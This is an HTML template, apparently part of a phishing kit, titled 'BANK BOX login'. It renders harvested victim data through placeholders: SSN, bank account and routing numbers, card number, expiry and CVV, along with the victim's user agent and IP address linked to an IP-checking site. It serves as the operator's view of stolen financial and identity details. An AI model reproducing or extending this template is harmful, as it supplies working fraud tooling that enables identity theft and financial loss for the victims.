<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Box</title>
</head>
<body>
<h2>BANK BOX login</h2>
<h3>Full Name: {{ emailaccess }}</h3>
<h3>Phone: {{ ephone }}</h3>
<h3>SSN: {{ ssn }}</h3>
<h3>Bank Account Number: {{ eaccountnum }}</h3>
<h3>Routing Number: {{ erouting }}</h3>
<h3>Credit Card Number: {{ ecc }}</h3>
<h3>Expiration Date: {{ eccex }}</h3>
<h3>CVV: {{ ecccvv }}</h3>
<h3>Card Holder Name: {{ ecardholder }}</h3>
<h3>BROSWER UserAgent: {{ useragent }}</h3> <!-- Close the <h3> tag here -->
<h3>CLIENT IPAddress: <a href='http://whoer.net/check?host={{ ipman }}' target='_blank'>{{ ipman }}</a></h3>
</body>
</html>